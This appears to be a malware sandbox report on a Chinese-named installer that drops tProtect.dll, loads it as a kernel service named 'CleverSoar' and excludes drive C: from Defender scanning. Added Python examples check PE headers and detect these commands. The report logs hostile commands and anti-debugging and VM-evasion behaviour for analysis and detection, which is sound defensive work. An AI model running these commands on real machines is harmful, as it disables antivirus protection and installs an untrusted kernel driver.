Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static file information: File size 5707684 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1831583959.0000000003740000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1831723417.0000000000BF0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00A757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00A757D0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.1.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: real checksum: 0x0 should be: 0x579ef1
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.1.dr | Static PE information: section name: .00cfg
Source: update.vac.1.dr | Static PE information: section name: .voltbl
Source: update.vac.1.dr | Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .=~
Source: is-B21TE.tmp.6.dr | Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C1686EB push ecx; ret 6_2_6C1686FE
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C010F00 push ss; retn 0001h 6_2_6C010F0A
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C236F10 push eax; ret 6_2_6C236F2E
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C19B9F4 push 004AC35Ch; ret 6_2_6C19BA0E
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C237290 push eax; ret 6_2_6C2372BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_009F45F4 push 00A9C35Ch; ret 10_2_009F460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00A8FB10 push eax; ret 10_2_00A8FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00A8FE90 push eax; ret 10_2_00A8FEBE
Source: update.vac.1.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
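The checksum, section-name and entropy findings above are plain static checks that can be reproduced without the sandbox. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it builds a small constructed PE32 image in memory with a flat `.text` section and a packed section named `.=~` (the name the report flags), parses the headers, recomputes the PE checksum with the documented algorithm (end-around-carry sum of 16-bit words over the whole file, skipping the CheckSum field itself, plus the file length), compares it with the stored CheckSum, and flags section names containing characters outside `[A-Za-z0-9._$]` and sections whose Shannon entropy exceeds 7.0 bits per byte. The 7.0 threshold and the allowed-character set are the author's assumptions. A zero CheckSum is common for images built by toolchains that do not fill the field, so on its own it is a forensic indicator of how the file was produced or modified, not a load-time failure for a user-mode executable.

```python
"""Added example: static PE checks (checksum, section names, entropy) on a constructed image."""
import math
import re
import struct
from collections import Counter
from typing import Dict, List, Tuple

SAFE_SECTION_NAME = re.compile(r"^[A-Za-z0-9._$]+$")  # assumption: what linkers normally emit
HIGH_ENTROPY = 7.0  # assumption: bits/byte above which a section is treated as packed/encrypted


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """End-around-carry sum of 16-bit words, skipping the 4-byte CheckSum field, plus file length."""
    length = len(data)
    if length % 2:
        data += b"\0"
    total = 0
    for off in range(0, len(data), 2):
        if checksum_offset <= off < checksum_offset + 4:
            continue
        total += int.from_bytes(data[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + length) & 0xFFFFFFFF


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def parse_pe(data: bytes) -> Tuple[int, int, List[Tuple[str, bytes]]]:
    """Return (file offset of CheckSum, stored CheckSum, [(section name, raw bytes), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    checksum_offset = opt + 64  # CheckSum sits at +64 in both PE32 and PE32+ optional headers
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    sections = []
    table = opt + opt_size
    for i in range(num_sections):
        hdr = table + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, data[raw_ptr:raw_ptr + raw_size]))
    return checksum_offset, stored, sections


def analyze_pe(data: bytes) -> Dict[str, object]:
    """Reproduce the report's three static findings for one image."""
    checksum_offset, stored, sections = parse_pe(data)
    computed = pe_checksum(data, checksum_offset)
    secs = []
    for name, raw in sections:
        ent = shannon_entropy(raw)
        secs.append({"name": name, "entropy": round(ent, 3),
                     "odd_name": SAFE_SECTION_NAME.match(name) is None,
                     "high_entropy": ent > HIGH_ENTROPY})
    return {"checksum_offset": checksum_offset, "stored_checksum": stored,
            "computed_checksum": computed, "checksum_mismatch": stored != computed,
            "sections": secs}


def fix_checksum(data: bytes) -> bytes:
    """Return a copy with the CheckSum field set to the recomputed value."""
    checksum_offset, _, _ = parse_pe(data)
    patched = bytearray(data)
    struct.pack_into("<I", patched, checksum_offset, pe_checksum(data, checksum_offset))
    return bytes(patched)


def build_sample_pe() -> bytes:
    """Constructed PE32 image (not a real binary): a flat .text section and a packed
    section named '.=~' like the one in the report; CheckSum is left at 0."""
    sections = [(b".text", b"\x90" * 512), (b".=~", bytes(range(256)) * 16)]
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic; CheckSum (opt+64) stays 0
    raw_ptr = 64 + 4 + 20 + 224 + 40 * len(sections)
    headers, raw = b"", b""
    for i, (name, body) in enumerate(sections):
        headers += struct.pack("<8sIIIIIIHHI", name, len(body), 0x1000 * (i + 1),
                               len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw += body
        raw_ptr += len(body)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers + raw


if __name__ == "__main__":
    result = analyze_pe(build_sample_pe())
    print("checksum: stored 0x%x, computed 0x%x" % (result["stored_checksum"], result["computed_checksum"]))
    for s in result["sections"]:
        print(s)
```

Pointing `analyze_pe` at the bytes of a real dropped file gives the same "real checksum / should be" pair the report prints; `fix_checksum` is useful when you need a clean copy for tooling that insists on a valid checksum, and it does not alter the computed value because the field itself is excluded from the sum.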
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | File created: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Program Files (x86)\Windows NT\is-B21TE.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | File created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical events)
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (6 identical events)
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (96 identical events)
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (10 identical events)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6208
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3651
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window / User API: threadDelayed 605
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window / User API: threadDelayed 602
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window / User API: threadDelayed 542
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-B21TE.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (32 identical events)
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C15AEC0 FindFirstFileA,FindClose,FindClose, 6_2_6C15AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_009F6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_009F6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_009F7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_009F7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_009F9C60 GetSystemInfo, 10_2_009F9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000002.1807351130.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000002.1807351130.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6BFE3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6BFE3886 (ThreadInformationClass 0x11 = ThreadHideFromDebugger)
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Thread information set: HideFromDebugger (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C170181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C170181
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00A757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00A757D0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C179D35 mov eax, dword ptr fs:[00000030h] 6_2_6C179D35
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C179D66 mov eax, dword ptr fs:[00000030h] 6_2_6C179D66
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C16F17D mov eax, dword ptr fs:[00000030h] 6_2_6C16F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C168CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6C168CBD
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C170181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C170181

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (2 identical events)
Source: tProtect.dll.12.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (31 identical events)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
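The process-creation entries above show the two defence-evasion steps in order: the installer launches powershell.exe with Add-MpPreference -ExclusionPath 'C:\', which removes the whole system drive from Defender scanning, and cmd.exe then registers the dropped tProtect.dll as an auto-start kernel-mode service named CleverSoar (type= kernel) and starts it repeatedly with sc start. The Python script below is an added example, not part of the Joe Sandbox report: a detection that runs over process-creation command lines, parsing sc.exe's "key= value" syntax (the space belongs after the equals sign) and PowerShell's -Command / -EncodedCommand arguments. It goes beyond the plain-text case in this report by also decoding base64 UTF-16LE encoded commands and comma-separated exclusion lists. The sample lines are constructed, with the first two copied from the report; the two heuristics, that a legitimate kernel driver is a .sys file under system32\drivers and that an exclusion deeper than one folder is scoped, are assumptions for the demonstration.

```python
"""Flag two defence-evasion commands from this report: a kernel-mode service whose
image is a dropped DLL (sc create ... type= kernel) and a Defender exclusion that
covers a whole drive (Add-MpPreference -ExclusionPath 'C:\\'). Added example."""
import base64
import re
from typing import Dict, List, Optional, Tuple


def win_tokens(cmdline: str) -> List[str]:
    """Whitespace split honouring "..." and '...'; backslashes stay literal (path
    separators), which is why shlex in POSIX mode is not used here."""
    toks, cur, quote = [], "", None
    for ch in cmdline:
        if quote:
            if ch == quote:
                quote = None
            else:
                cur += ch
        elif ch in "\"'":
            quote = ch
        elif ch.isspace():
            if cur:
                toks.append(cur)
            cur = ""
        else:
            cur += ch
    return toks + [cur] if cur else toks


def parse_sc_create(cmdline: str) -> Optional[Dict[str, str]]:
    """'sc create <name> key= value ...' -> dict (None if not an sc create).
    sc.exe wants the space *after* '=', so 'binPath= C:\\x' is two tokens."""
    t = win_tokens(cmdline)
    if len(t) < 3 or t[0].rsplit("\\", 1)[-1].lower() not in ("sc", "sc.exe") or t[1].lower() != "create":
        return None
    svc = {"name": t[2]}
    for i in range(3, len(t) - 1):
        if t[i].endswith("="):
            svc[t[i][:-1].lower()] = t[i + 1]
    return svc


def driver_service_reasons(svc: Dict[str, str]) -> List[str]:
    """Why a 'type= kernel' service looks wrong; assumed norm: a .sys under system32\\drivers."""
    if svc.get("type", "").lower() != "kernel":
        return []
    path, reasons = svc.get("binpath", "").lower(), []
    if "\\system32\\drivers\\" not in path:
        reasons.append("driver image outside system32\\drivers")
    if not path.endswith(".sys"):
        reasons.append("driver image is not a .sys file")
    return reasons


def powershell_script(cmdline: str) -> Optional[str]:
    """Script passed via -Command/-EncodedCommand, accepting the abbreviations
    PowerShell accepts (-c, -enc, ...) and decoding base64 UTF-16LE."""
    t = win_tokens(cmdline)
    if not t or not t[0].rsplit("\\", 1)[-1].lower().startswith(("powershell", "pwsh")):
        return None
    for i in range(1, len(t) - 1):
        flag = t[i].lstrip("-/").lower()
        if flag and "command".startswith(flag):
            return " ".join(t[i + 1:])           # -Command takes the rest of the line
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(t[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def exclusion_paths(script: str) -> List[str]:
    """Paths given to Add-/Set-MpPreference -ExclusionPath (comma lists and the
    unambiguous prefix -ExclusionPa... accepted, as PowerShell does)."""
    t, paths = win_tokens(script), []
    for i, tok in enumerate(t[:-2]):
        if tok.lower() in ("add-mppreference", "set-mppreference"):
            for j in range(i + 1, len(t) - 1):
                flag = t[j].lstrip("-").lower()
                if flag.startswith("exclusionpa") and "exclusionpath".startswith(flag):
                    paths += [p.strip() for p in t[j + 1].split(",") if p.strip()]
    return paths


def is_broad_exclusion(path: str) -> bool:
    """Drive roots, wildcards and single top-level folders (C:\\Windows) count as
    too broad; deeper paths count as scoped (assumption for this demo)."""
    p = path.strip().rstrip("\\")
    parts = [s for s in p.split("\\") if s]
    return "*" in p or (bool(parts) and re.fullmatch(r"[a-z]:", parts[0], re.I) is not None and len(parts) <= 2)


def scan(cmdlines: List[str]) -> List[Tuple[str, str, str]]:
    """(rule, detail, command line) for every hit over process-creation command lines."""
    hits = []
    for cl in cmdlines:
        svc = parse_sc_create(cl)
        for r in (driver_service_reasons(svc) if svc else []):
            hits.append(("kernel_service_suspicious_image", f"{svc['name']}: {r}", cl))
        script = powershell_script(cl)
        for p in (exclusion_paths(script) if script else []):
            if is_broad_exclusion(p):
                hits.append(("defender_broad_exclusion", p, cl))
    return hits


# Constructed sample; the first two entries are the report's own command lines.
_ENC = base64.b64encode("Add-MpPreference -ExclusionPath 'D:\\'".encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    r'sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto',
    '"powershell.exe" -Command "Add-MpPreference -ExclusionPath \'C:\\\'"',
    r"sc create MyDrv binPath= C:\Windows\System32\drivers\mydrv.sys type= kernel start= demand",
    'powershell.exe -NoProfile -Command "Add-MpPreference -ExclusionPath \'C:\\Build\\Agent\\_work\'"',
    "powershell.exe -NonInteractive -enc " + _ENC,
]
```

Fed the five sample lines, scan() returns two hits for the CleverSoar service (image outside system32\drivers, not a .sys file) and one broad-exclusion hit each for 'C:\' and the encoded 'D:\' case, and nothing for the two benign lines. The same parsing works on Sysmon Event ID 1 or Security 4688 command lines. Third-party drivers outside system32\drivers do exist, so the kernel-service rule is a triage signal rather than a verdict; the combination seen here, a kernel service whose image is a .dll in Program Files created moments after a whole-drive Defender exclusion, is what should page someone.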
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6C237720 cpuid 6_2_6C237720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
